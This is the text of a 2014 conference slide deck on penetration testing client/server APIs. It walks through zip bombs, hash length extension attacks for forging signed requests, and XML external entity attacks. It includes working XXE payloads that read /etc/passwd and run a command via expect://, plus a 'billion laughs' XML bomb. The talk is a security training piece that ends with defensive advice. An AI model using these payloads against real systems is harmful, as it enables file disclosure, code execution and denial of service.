CodeFest 2014 - Pentesting client/server API

Pentesting client/server API
Sergey Belov

$ whoami
© 2002—2014, Digital Security 2
• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction
CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)

What are we talking about?
API

API

Hacking via API

Hacking via API
From interface to API methods

Hacking via API

Hacking via API
What should we test?
• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering
Developing
• Stop hacks and custom implementation in API! Really

Hacking via API

Hacking via API
ZIP

Hacking via API
42 Kb…

Hacking via API
42 Kb…
…10 Gb?

Hacking via API
42 Kb…
…10 Gb?
…100 Gb?

Hacking via API
42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?

Hacking via API
42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?
…4.5 Pb! http://www.unforgettable.dk/

Hacking via API
Say
HELLO
to
ZIP BOMB!

Hacking via API
The evil of JavaScript
and

Hacking via API

Hacking via API
http://habrahabr.ru/post/186160/

Hacking via API
Crypto

Hacking via API
Query signing
Sign = sha*(…+DATA+…)
APIkey

Hacking via API

Hacking via API
But why?

Hacking via API
Say hello again.
To length extension attack

Hacking via API
A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)

Hacking via API
Some have hijacked just 1 request…

Hacking via API
What does the attacker know?
• Original data
• Sign (token)

Hacking via API
What does the attacker want?
Change some data / change params

Hacking via API
A=1&B=2&C=3x80x00x00…x02&C=4

Hacking via API
Can sign new query without API key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU sig = md5(uid + params + private_key)
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack

Hacking via API
Request hijacking…
How?

Hacking via API

Hacking via API
XML? XML entities!

Hacking via API
DTD Example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">
XML example:
<author>&writer;&copyright;</author>

Hacking via API
XML entities?
External Entity!

Hacking via API
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>
<foo>&xxe;</foo>

Hacking via API
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
“expect://id" >]>
<foo>&xxe;</foo>

Hacking via API
XML Bombs!

Hacking via API
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz
(#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]>
<lolz>&lol9;</lolz>

Man in the Middle

Hacking via API
Examples?

Hacking via API
2013-11-19 by Reginaldo Silva

Hacking via API
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

Hacking via API
Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896
Development:
• Disable entities

Hacking via API
Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]

twitter.com/sergeybelove
sbelov@dsec.ru
Digital Security в Москве: (495) 223-07-86
Digital Security в Санкт-Петербурге: (812) 703-15-47
Hacking via API
Thanks for your attention!
Questions?

CodeFest 2014 - Pentesting client/server API

More Related Content

CodeFest 2014 - Pentesting client/server API